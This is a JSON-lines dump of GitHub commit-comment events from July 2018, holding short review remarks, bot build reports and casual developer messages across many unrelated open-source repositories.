{"id":"8001031451","type":"CommitCommentEvent","actor":{"login":"kngwyu"},"repo":{"name":"rust-lang-nursery/rls"},"payload":{"comment":{"id":29794593,"position":13,"line":645,"path":"src/actions/hover.rs","commit_id":"85ee3e6208a501611e958facff5db35c5a5c6689","created_at":"2018-07-22T23:11:12Z","updated_at":"2018-07-22T23:11:12Z","author_association":"CONTRIBUTOR","body":"OMG, thanks for reporting."}},"created_at":"2018-07-22T23:11:12Z"}
{"id":"8001034735","type":"CommitCommentEvent","actor":{"login":"VulcanDev"},"repo":{"name":"VulcanDev/django-react"},"payload":{"comment":{"id":29794598,"position":null,"line":null,"path":null,"commit_id":"6abc7d1641b36f975f71092b3cd1aef23dfcd27d","created_at":"2018-07-22T23:14:01Z","updated_at":"2018-07-22T23:14:01Z","author_association":"OWNER","body":"* Meant to be a conflict resolve."}},"created_at":"2018-07-22T23:14:01Z"}
{"id":"8001035224","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794599,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-22T23:14:24Z","updated_at":"2018-07-22T23:14:24Z","author_association":"NONE","body":"After this commit I'm unable to start DMR2YSF in Daemon mode?"}},"created_at":"2018-07-22T23:14:24Z"}
{"id":"8001054977","type":"CommitCommentEvent","actor":{"login":"BryanCachimuel"},"repo":{"name":"josueAlba/SGIERT"},"payload":{"comment":{"id":29794620,"position":null,"line":null,"path":null,"commit_id":"86649939dac716bad0c57c96237b0aa0eb97adde","created_at":"2018-07-22T23:30:01Z","updated_at":"2018-07-22T23:30:01Z","author_association":"NONE","body":"Parte de Bryan Cachimuel\r\n[SGIERT.zip](https://github.com/josueAlba/SGIERT/files/2217503/SGIERT.zip)"}},"created_at":"2018-07-22T23:30:01Z"}
{"id":"8001057802","type":"CommitCommentEvent","actor":{"login":"bashor"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29794625,"position":5,"line":62,"path":"compiler/testData/ir/irText/declarations/provideDelegate/memberExtension.txt","commit_id":"ae0704af9cb5df8ae1bbbb1bc76ca45f9aa9719a","created_at":"2018-07-22T23:32:08Z","updated_at":"2018-07-22T23:32:08Z","author_association":"MEMBER","body":"@dnpetrov \r\nI think psi2ir must generate `GET_VAR` in such cases (accessing to members of an object by `this`).\r\nOtherwise, we have a recursion.\r\nFor more examples see failed tests on TC."}},"created_at":"2018-07-22T23:32:08Z"}
{"id":"8001057950","type":"CommitCommentEvent","actor":{"login":"siemiatj"},"repo":{"name":"metasfresh/metasfresh-webui-frontend"},"payload":{"comment":{"id":29794626,"position":5,"line":63,"path":"cypress/support/commands.js","commit_id":"20088a0c350e47ea9f5f07f3690a2babe8a39204","created_at":"2018-07-22T23:32:14Z","updated_at":"2018-07-22T23:32:14Z","author_association":"CONTRIBUTOR","body":"hmm I think this won't work. The  `ES6-way` would be to use templates instead, like : \r\n\r\n```javascript\r\n`${config.API_URL}/login/authenticate`\r\n```"}},"created_at":"2018-07-22T23:32:14Z"}
{"id":"8001060582","type":"CommitCommentEvent","actor":{"login":"geissonator"},"repo":{"name":"openbmc/openbmc"},"payload":{"comment":{"id":29794631,"position":null,"line":null,"path":null,"commit_id":"aad617f2cef143937204e78ee7b10da5d197420b","created_at":"2018-07-22T23:34:18Z","updated_at":"2018-07-22T23:34:18Z","author_association":"CONTRIBUTOR","body":"Yeah, something fishy going on here (per my commit message).  I think it may be related to us putting the service in the standby target (so not using socket activation for it)?  Something causes the incorrect shutdown order during the bmc reboot."}},"created_at":"2018-07-22T23:34:18Z"}
{"id":"8001062573","type":"CommitCommentEvent","actor":{"login":"cdavis314"},"repo":{"name":"cdavis314/hello_world"},"payload":{"comment":{"id":29794632,"position":null,"line":null,"path":null,"commit_id":"0aa0a29256dbbc0b836cdc05bcac6de381273a10","created_at":"2018-07-22T23:35:43Z","updated_at":"2018-07-22T23:35:43Z","author_association":"OWNER","body":"Change??"}},"created_at":"2018-07-22T23:35:43Z"}
{"id":"8001075549","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29794674,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-22T23:45:41Z","updated_at":"2018-07-22T23:45:41Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-22T23:45:41Z"}
{"id":"8001075648","type":"CommitCommentEvent","actor":{"login":"sim0504"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29794675,"position":41,"line":59,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-22T23:45:46Z","updated_at":"2018-07-22T23:45:46Z","author_association":"MEMBER","body":"ceci peut être pas mal simplifier pour rendre le calcul plus lisible. Je regarde ca plus en détails tantôt."}},"created_at":"2018-07-22T23:45:46Z"}
{"id":"8001076328","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29794677,"position":null,"line":null,"path":null,"commit_id":"3f4b936a60c13a735546f2798e72a5c90fc55a32","created_at":"2018-07-22T23:46:20Z","updated_at":"2018-07-22T23:46:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CrayonBank](https://trello.com/c/9A6lNHFk/11-crayonbank)"}},"created_at":"2018-07-22T23:46:20Z"}
{"id":"8001076382","type":"CommitCommentEvent","actor":{"login":"sim0504"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29794678,"position":73,"line":94,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-22T23:46:21Z","updated_at":"2018-07-22T23:46:21Z","author_association":"MEMBER","body":"regarde clamp dans geometry"}},"created_at":"2018-07-22T23:46:21Z"}
{"id":"8001077237","type":"CommitCommentEvent","actor":{"login":"kylebuch8"},"repo":{"name":"RHElements/rhelements"},"payload":{"comment":{"id":29794679,"position":239,"line":245,"path":"elements/rh-accordion/test/rh-accordion_test.html","commit_id":"9b63aca80e7bce57f171a4b0c567613f85ad7a16","created_at":"2018-07-22T23:47:05Z","updated_at":"2018-07-22T23:47:05Z","author_association":"MEMBER","body":"@starryeyez024 That's a good idea. I'll add that in."}},"created_at":"2018-07-22T23:47:05Z"}
{"id":"8001079472","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29794681,"position":null,"line":null,"path":null,"commit_id":"fd0423c7339b6001aabdf56e19dac85803d5f457","created_at":"2018-07-22T23:48:59Z","updated_at":"2018-07-22T23:48:59Z","author_association":"OWNER","body":"Excellent!"}},"created_at":"2018-07-22T23:48:59Z"}
{"id":"8001082562","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29794690,"position":345,"line":11120,"path":"src/Psalm/CallMap.php","commit_id":"d3fc9a51e0519379a27c05318e5f6fd41d46f797","created_at":"2018-07-22T23:51:20Z","updated_at":"2018-07-22T23:51:20Z","author_association":"CONTRIBUTOR","body":"The other changes seem reasonable, we'll have to agree to disagree about whether null is permitted.\r\n\r\nOther thoughts:\r\n\r\n- Can checking if optional parameters don't contain reasonable defaults in the union type (false, null, or scalar) be checked for in CI checks? (e.g. ` 'timezone='=>'DateTimeZone|null'],`)\r\n- Having separate repos for the callmap (and maintaining forks with merged commits) might save time in the long run"}},"created_at":"2018-07-22T23:51:20Z"}
{"id":"8001085691","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29794693,"position":345,"line":11120,"path":"src/Psalm/CallMap.php","commit_id":"d3fc9a51e0519379a27c05318e5f6fd41d46f797","created_at":"2018-07-22T23:53:55Z","updated_at":"2018-07-22T23:53:55Z","author_association":"CONTRIBUTOR","body":"Unrelated, didn't know where to put this: formatting on https://github.com/vimeo/psalm/releases/tag/2.0.9 is off for the `@method` annotation (missing a backtick?)"}},"created_at":"2018-07-22T23:53:55Z"}
{"id":"8001086498","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794694,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-22T23:54:34Z","updated_at":"2018-07-22T23:54:34Z","author_association":"OWNER","body":"Check the error message with the last change in DMR2YSF, probably permissions problems."}},"created_at":"2018-07-22T23:54:34Z"}
{"id":"8001088905","type":"CommitCommentEvent","actor":{"login":"elling-elling"},"repo":{"name":"elling-elling/new"},"payload":{"comment":{"id":29794698,"position":null,"line":null,"path":null,"commit_id":"d1017e04d5f2092cf83d7ea3462093384574b69c","created_at":"2018-07-22T23:56:14Z","updated_at":"2018-07-22T23:56:14Z","author_association":"OWNER","body":"Такс..."}},"created_at":"2018-07-22T23:56:14Z"}
{"id":"8001089119","type":"CommitCommentEvent","actor":{"login":"muglug"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29794699,"position":345,"line":11120,"path":"src/Psalm/CallMap.php","commit_id":"d3fc9a51e0519379a27c05318e5f6fd41d46f797","created_at":"2018-07-22T23:56:23Z","updated_at":"2018-07-22T23:56:23Z","author_association":"MEMBER","body":"> Having separate repos for the callmap (and maintaining forks with merged commits) might save time in the long run\r\n\r\nAh, that'd be a great solution - do you want to create something in https://github.com/phan? I can then fork in https://github.com/psalm and @ondrejmirtes in https://github.com/phpstan"}},"created_at":"2018-07-22T23:56:23Z"}
{"id":"8001089319","type":"CommitCommentEvent","actor":{"login":"elling-elling"},"repo":{"name":"elling-elling/new"},"payload":{"comment":{"id":29794700,"position":2,"line":2,"path":"index.php","commit_id":"d1017e04d5f2092cf83d7ea3462093384574b69c","created_at":"2018-07-22T23:56:32Z","updated_at":"2018-07-22T23:56:32Z","author_association":"OWNER","body":"345"}},"created_at":"2018-07-22T23:56:32Z"}
{"id":"7999533496","type":"CommitCommentEvent","actor":{"login":"natvol"},"repo":{"name":"natvol/natvol.github.io"},"payload":{"comment":{"id":29790847,"position":null,"line":null,"path":null,"commit_id":"a56970c7d730b3c54f9f1bd911f847be5a772e3a","created_at":"2018-07-22T03:01:04Z","updated_at":"2018-07-22T03:01:04Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-22T03:01:04Z"}
{"id":"7999534304","type":"CommitCommentEvent","actor":{"login":"robertmaxwilliams"},"repo":{"name":"uw-cmg/MAST-ML"},"payload":{"comment":{"id":29790849,"position":null,"line":null,"path":null,"commit_id":"23d763482265e2cf02b11726d36deb0296cb737e","created_at":"2018-07-22T03:01:53Z","updated_at":"2018-07-22T03:01:53Z","author_association":"COLLABORATOR","body":"You shouldn't need to call `round` when using `_set_tick_labels`, because it trims everything to three sigfigs, which is safer than your `rounder` which will fail for numbers less than `0.001` causing them to be rounded to nearest int."}},"created_at":"2018-07-22T03:01:53Z"}
{"id":"7999539579","type":"CommitCommentEvent","actor":{"login":"noahxp104"},"repo":{"name":"noahxp/git-example"},"payload":{"comment":{"id":29790858,"position":null,"line":null,"path":null,"commit_id":"bb69f289edf23724c1c7b800ba52f493961ad249","created_at":"2018-07-22T03:07:19Z","updated_at":"2018-07-22T03:07:19Z","author_association":"COLLABORATOR","body":"review-finish"}},"created_at":"2018-07-22T03:07:19Z"}
{"id":"7999540780","type":"CommitCommentEvent","actor":{"login":"samizzo"},"repo":{"name":"open-watcom/open-watcom-v2"},"payload":{"comment":{"id":29790862,"position":null,"line":null,"path":null,"commit_id":"e641049f6ed1238a226617c1dd69e0d7e0dc6f70","created_at":"2018-07-22T03:08:39Z","updated_at":"2018-07-22T03:08:39Z","author_association":"NONE","body":"@jmalak I just pulled latest (bad timing I guess!) and this change has broken the build when building under UNIX (also macOS) because the makefile hasn't been updated with the new file. I'm not too familiar with automake - do you generate `Makefile.in` from `Makefile.am` or is it safe to just modify both manually?"}},"created_at":"2018-07-22T03:08:39Z"}
{"id":"7999544278","type":"CommitCommentEvent","actor":{"login":"cipig"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29790866,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T03:12:22Z","updated_at":"2018-07-22T03:12:22Z","author_association":"NONE","body":"Half of the exchanges also use PAC as symbol, it is PAC in jl's repo and i use it on my LPs too. $ is a special character and using it can cause problems in scripts."}},"created_at":"2018-07-22T03:12:22Z"}
{"id":"7999544911","type":"CommitCommentEvent","actor":{"login":"nelson1967"},"repo":{"name":"nelson1967/udemy-heroes"},"payload":{"comment":{"id":29790868,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-22T03:13:05Z","updated_at":"2018-07-22T03:13:05Z","author_association":"OWNER","body":"### Nota\r\nBien agregado este suoer villano, lo necesitaremos para el proyecto 👍 "}},"created_at":"2018-07-22T03:13:05Z"}
{"id":"7999546532","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"moham96/meta-amlogic"},"payload":{"comment":{"id":29790870,"position":null,"line":null,"path":null,"commit_id":"2a83ce32837b8c76affa61b2b0339eaf83d1df42","created_at":"2018-07-22T03:14:53Z","updated_at":"2018-07-22T03:14:53Z","author_association":"NONE","body":"Would you please send your merge request once more? I did a mistake :("}},"created_at":"2018-07-22T03:14:53Z"}
{"id":"7999547243","type":"CommitCommentEvent","actor":{"login":"madmaxx711"},"repo":{"name":"madmaxx711/PUSH-ME"},"payload":{"comment":{"id":29790875,"position":null,"line":null,"path":null,"commit_id":"e7baa64648c888918ff78aa190b4dea15d43515d","created_at":"2018-07-22T03:15:37Z","updated_at":"2018-07-22T03:15:37Z","author_association":"OWNER","body":"\r\n[dov-sample-docx-file.docx](https://github.com/madmaxx711/PUSH-ME/files/2216695/dov-sample-docx-file.docx)\r\n![a 1](https://user-images.githubusercontent.com/36730662/43041900-78d966f6-8d33-11e8-8642-9c2e5f9765ed.jpg)\r\n"}},"created_at":"2018-07-22T03:15:37Z"}
{"id":"7999547902","type":"CommitCommentEvent","actor":{"login":"madmaxx711"},"repo":{"name":"madmaxx711/PUSH-ME"},"payload":{"comment":{"id":29790878,"position":null,"line":null,"path":null,"commit_id":"e7baa64648c888918ff78aa190b4dea15d43515d","created_at":"2018-07-22T03:16:17Z","updated_at":"2018-07-22T03:16:17Z","author_association":"OWNER","body":"[Documents (1).zip](https://github.com/madmaxx711/PUSH-ME/files/2216696/Documents.1.zip)\r\n"}},"created_at":"2018-07-22T03:16:17Z"}
{"id":"7999548325","type":"CommitCommentEvent","actor":{"login":"hcrgm"},"repo":{"name":"BukkitAPI-Translation-Group/Chinese_BukkitAPI"},"payload":{"comment":{"id":29790879,"position":null,"line":null,"path":null,"commit_id":"b58d264e2f40887b207252d0afa13a3668fcb47d","created_at":"2018-07-22T03:16:48Z","updated_at":"2018-07-22T03:16:48Z","author_association":"MEMBER","body":"瞎玩git，我想一次性同步两个分支，稍后会撤销这些变更"}},"created_at":"2018-07-22T03:16:48Z"}
{"id":"7999549418","type":"CommitCommentEvent","actor":{"login":"madmaxx711"},"repo":{"name":"madmaxx711/PUSH-ME"},"payload":{"comment":{"id":29790880,"position":null,"line":null,"path":null,"commit_id":"e7baa64648c888918ff78aa190b4dea15d43515d","created_at":"2018-07-22T03:17:59Z","updated_at":"2018-07-22T03:17:59Z","author_association":"OWNER","body":"\r\n![a](https://user-images.githubusercontent.com/36730662/43041908-cea01a8a-8d33-11e8-91cc-482e65966e19.jpg)\r\n\r\n"}},"created_at":"2018-07-22T03:17:59Z"}
{"id":"7999572901","type":"CommitCommentEvent","actor":{"login":"EstenGrove"},"repo":{"name":"EstenGrove/Portfolio1"},"payload":{"comment":{"id":29790909,"position":null,"line":null,"path":null,"commit_id":"6fe7729453d45deaad2d19ea06c517835fc78e5d","created_at":"2018-07-22T03:42:47Z","updated_at":"2018-07-22T03:42:47Z","author_association":"OWNER","body":"Clean up classes and convert CSS to SASS for reusables and ease of global editing"}},"created_at":"2018-07-22T03:42:47Z"}
{"id":"7999573247","type":"CommitCommentEvent","actor":{"login":"zuleima10"},"repo":{"name":"zuleima10/udemy-heroes"},"payload":{"comment":{"id":29790911,"position":null,"line":null,"path":null,"commit_id":"b6512ae247accf832faeb05daddba2ee17e80188","created_at":"2018-07-22T03:43:11Z","updated_at":"2018-07-22T03:43:11Z","author_association":"OWNER","body":"Perfecto, los cambios funcionaron 🍄 "}},"created_at":"2018-07-22T03:43:11Z"}
{"id":"7999573839","type":"CommitCommentEvent","actor":{"login":"SwiftFlying"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29790913,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-22T03:43:50Z","updated_at":"2018-07-22T03:43:50Z","author_association":"NONE","body":"Yes, the module manufacturer。My mailbox address is xuyongxiang003@foxmail.com"}},"created_at":"2018-07-22T03:43:50Z"}
{"id":"7999574629","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790914,"position":null,"line":null,"path":null,"commit_id":"5b8d2417bdc1085a22f2d006ab6f451a34e107e2","created_at":"2018-07-22T03:44:42Z","updated_at":"2018-07-22T03:44:42Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3028 "}},"created_at":"2018-07-22T03:44:42Z"}
{"id":"7999577241","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29790925,"position":null,"line":null,"path":null,"commit_id":"ccb265b0a529d52b5e95b78bb842224af1071111","created_at":"2018-07-22T03:47:46Z","updated_at":"2018-07-22T03:47:46Z","author_association":"OWNER","body":"Base game code order lame."}},"created_at":"2018-07-22T03:47:46Z"}
{"id":"7999577313","type":"CommitCommentEvent","actor":{"login":"samizzo"},"repo":{"name":"open-watcom/open-watcom-v2"},"payload":{"comment":{"id":29790926,"position":null,"line":null,"path":null,"commit_id":"e641049f6ed1238a226617c1dd69e0d7e0dc6f70","created_at":"2018-07-22T03:47:51Z","updated_at":"2018-07-22T03:47:51Z","author_association":"NONE","body":"I opened PR #466 to fix this."}},"created_at":"2018-07-22T03:47:51Z"}
{"id":"7999579707","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29790933,"position":null,"line":null,"path":null,"commit_id":"f432c4475a31ff077170a8e7743a4cf56a1be80e","created_at":"2018-07-22T03:50:37Z","updated_at":"2018-07-22T03:50:37Z","author_association":"MEMBER","body":"MAME can't magically tell that a screen is unimportant or shouldn't be displayed by default.  Systems should either use a better approach than fake screens, or use a layout to hide screens in the default view.\r\n\r\nThe alternative (and previous behaviour) is having screens *not* show when a slot device adds a screen (e.g. a serial terminal or additional video card). This has already been causing issues for people."}},"created_at":"2018-07-22T03:50:37Z"}
{"id":"7999581674","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790935,"position":null,"line":null,"path":null,"commit_id":"19b80848ccf75859677c039fa4172b30ef547db2","created_at":"2018-07-22T03:52:51Z","updated_at":"2018-07-22T03:52:51Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2987 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-22T03:52:51Z"}
{"id":"7999583014","type":"CommitCommentEvent","actor":{"login":"zakarie"},"repo":{"name":"zakarie/Exploring-and-Preparing-your-Data-with-BigQuery"},"payload":{"comment":{"id":29790939,"position":null,"line":null,"path":null,"commit_id":"16721cc6819099e385bae250fbb5a5890ec88513","created_at":"2018-07-22T03:54:25Z","updated_at":"2018-07-22T03:54:25Z","author_association":"OWNER","body":"Quiz 1 Solutions."}},"created_at":"2018-07-22T03:54:25Z"}
{"id":"7999583121","type":"CommitCommentEvent","actor":{"login":"littlepiggy03"},"repo":{"name":"littlepiggy03/randexp.js"},"payload":{"comment":{"id":29790940,"position":null,"line":null,"path":null,"commit_id":"d3bf3f4cd2f22f5426bff08ff3912e884b1fde1c","created_at":"2018-07-22T03:54:31Z","updated_at":"2018-07-22T03:54:31Z","author_association":"OWNER","body":"@thiagodp the PR of adding TypeScript definition file (fent/randexp.js#61) has been merge. Definition files is included in `randexp@0.5.3`."}},"created_at":"2018-07-22T03:54:31Z"}
{"id":"7999583952","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29790943,"position":null,"line":null,"path":null,"commit_id":"11cba0e9e107001ec92c8b5ec0995b19e3c245c0","created_at":"2018-07-22T03:55:28Z","updated_at":"2018-07-22T03:55:28Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-22T03:55:28Z"}
{"id":"7999586225","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790945,"position":null,"line":null,"path":null,"commit_id":"19b80848ccf75859677c039fa4172b30ef547db2","created_at":"2018-07-22T03:58:04Z","updated_at":"2018-07-22T03:58:04Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-22T03:58:04Z"}
{"id":"7999590479","type":"CommitCommentEvent","actor":{"login":"thiagodp"},"repo":{"name":"littlepiggy03/randexp.js"},"payload":{"comment":{"id":29790958,"position":null,"line":null,"path":null,"commit_id":"d3bf3f4cd2f22f5426bff08ff3912e884b1fde1c","created_at":"2018-07-22T04:02:33Z","updated_at":"2018-07-22T04:02:33Z","author_association":"NONE","body":"Thx! 👍 "}},"created_at":"2018-07-22T04:02:33Z"}
{"id":"7999591527","type":"CommitCommentEvent","actor":{"login":"andrewyunt"},"repo":{"name":"andrewyunt/warfare"},"payload":{"comment":{"id":29790960,"position":null,"line":null,"path":null,"commit_id":"5db8505bd9e3851945c37eb62d6e3ce48092c0e5","created_at":"2018-07-22T04:03:37Z","updated_at":"2018-07-22T04:03:37Z","author_association":"OWNER","body":"got a life, busy working in tech"}},"created_at":"2018-07-22T04:03:37Z"}
{"id":"7999593184","type":"CommitCommentEvent","actor":{"login":"ArmandoMorales"},"repo":{"name":"ArmandoMorales/javascript-tutorial"},"payload":{"comment":{"id":29790962,"position":16,"line":16,"path":"arrays.js","commit_id":"025cebbc1c977df59a189d9c26a2e7ec03316fea","created_at":"2018-07-22T04:05:19Z","updated_at":"2018-07-22T04:05:19Z","author_association":"OWNER","body":"como recorrer un array"}},"created_at":"2018-07-22T04:05:19Z"}
{"id":"7999595384","type":"CommitCommentEvent","actor":{"login":"brandong1"},"repo":{"name":"brandong1/text_editor"},"payload":{"comment":{"id":29790963,"position":null,"line":null,"path":null,"commit_id":"7649ed48fe5e30d71af9f489414b7ac175fb11fe","created_at":"2018-07-22T04:07:37Z","updated_at":"2018-07-22T04:07:37Z","author_association":"OWNER","body":"Need to identify what is being added to each commit to more accurately name my commits."}},"created_at":"2018-07-22T04:07:37Z"}
{"id":"7999595693","type":"CommitCommentEvent","actor":{"login":"ivomarsan"},"repo":{"name":"kazupon/vue-cli-plugin-i18n"},"payload":{"comment":{"id":29790965,"position":null,"line":null,"path":null,"commit_id":"63192eceb17926325fe3f2f5493766e2b9aaaed8","created_at":"2018-07-22T04:07:59Z","updated_at":"2018-07-22T04:07:59Z","author_association":"NONE","body":"Can you add `enableInSFC` support inside `i18n: {}` options?\r\nI guess that this option dont recognize inside i18n options object. To solve I go back to outside, like this in my `vue.config.js`:\r\n```javascript\r\nmodule.exports = {\r\n  // ...\r\n  pluginOptions: {\r\n    i18n: {\r\n      locale: 'en', \r\n      fallbackLocale: 'en', \r\n      localeDir: 'i18n/locales/messages',\r\n      enableInSFC: true // This Doesn't works!\r\n    },\r\n    enableInSFC: true // This Works!\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-22T04:07:59Z"}
{"id":"7999596340","type":"CommitCommentEvent","actor":{"login":"Bluscream"},"repo":{"name":"Bluscream/GrieferGames-ScammerList"},"payload":{"comment":{"id":29790966,"position":13,"line":null,"path":"add.php","commit_id":"0de270efeaff6b0797e6751b8f4c10b55c30a5df","created_at":"2018-07-22T04:08:43Z","updated_at":"2018-07-22T04:08:43Z","author_association":"OWNER","body":"Webserver should not request that page"}},"created_at":"2018-07-22T04:08:43Z"}
{"id":"7999597433","type":"CommitCommentEvent","actor":{"login":"CMCDragonkai"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29790971,"position":1,"line":1,"path":"pkgs/development/python-modules/image-match/default.nix","commit_id":"5fba38d65c895b3de627711533b68efcb1b83133","created_at":"2018-07-22T04:09:58Z","updated_at":"2018-07-22T04:09:58Z","author_association":"CONTRIBUTOR","body":"@FRidh The `dask` is no longer required in this expression."}},"created_at":"2018-07-22T04:09:58Z"}
{"id":"7999600520","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29790972,"position":null,"line":null,"path":null,"commit_id":"6fea6c4fec17a36939e657b4acabcb534c3a902a","created_at":"2018-07-22T04:13:03Z","updated_at":"2018-07-22T04:13:03Z","author_association":"OWNER","body":"Ты уверен? [Тут](https://github.com/KRodinn/OGSR-Engine/blob/6fea6c4fec17a36939e657b4acabcb534c3a902a/ogsr_engine/xrCore/xrDebugNew.cpp#L136) например так с оригинала сделано.\r\nКак-то сомневаюсь, что оно может убивать сторонние процессы винды.\r\nВчера проверял - процесс движка убивается, как надо. Ничего странного не заметил."}},"created_at":"2018-07-22T04:13:03Z"}
{"id":"7999603938","type":"CommitCommentEvent","actor":{"login":"wei-yuma"},"repo":{"name":"Tencent/ncnn"},"payload":{"comment":{"id":29790977,"position":66,"line":66,"path":"examples/yolov2.cpp","commit_id":"eb089c0b324ac20cad6639e6cab19405e3984852","created_at":"2018-07-22T04:16:48Z","updated_at":"2018-07-22T04:16:48Z","author_association":"NONE","body":"aa"}},"created_at":"2018-07-22T04:16:48Z"}
{"id":"7999605834","type":"CommitCommentEvent","actor":{"login":"drofp"},"repo":{"name":"SJSU-AD/FusionAD"},"payload":{"comment":{"id":29790978,"position":null,"line":null,"path":null,"commit_id":"25e3cfd6249a9921d2ebec32002c53878cbb34d9","created_at":"2018-07-22T04:18:55Z","updated_at":"2018-07-22T04:18:55Z","author_association":"COLLABORATOR","body":"i agree"}},"created_at":"2018-07-22T04:18:55Z"}
{"id":"7999606599","type":"CommitCommentEvent","actor":{"login":"drofp"},"repo":{"name":"SJSU-AD/FusionAD"},"payload":{"comment":{"id":29790980,"position":null,"line":null,"path":null,"commit_id":"efd703ccedd2d37e16adf3b17cbce8073db9f052","created_at":"2018-07-22T04:19:47Z","updated_at":"2018-07-22T04:19:47Z","author_association":"COLLABORATOR","body":":1st_place_medal: "}},"created_at":"2018-07-22T04:19:47Z"}
{"id":"7999608692","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":29790982,"position":null,"line":null,"path":null,"commit_id":"e3958789165663eb74fd69e27e302c81d61821bb","created_at":"2018-07-22T04:21:54Z","updated_at":"2018-07-22T04:21:54Z","author_association":"MEMBER","body":"https://github.com/ossrs/srs/issues/917#issuecomment-406795463"}},"created_at":"2018-07-22T04:21:54Z"}
{"id":"7999615582","type":"CommitCommentEvent","actor":{"login":"doug-salvati"},"repo":{"name":"doug-salvati/Brick-Collector"},"payload":{"comment":{"id":29790994,"position":15,"line":15,"path":"src/components/dialogs/AddPart/AddPart.js","commit_id":"941824b1862d28ee09a3573fa71325a87979cf0e","created_at":"2018-07-22T04:29:19Z","updated_at":"2018-07-22T04:29:19Z","author_association":"OWNER","body":"not an actual API key; the real ones are placed in a text file starting in a later commit"}},"created_at":"2018-07-22T04:29:19Z"}
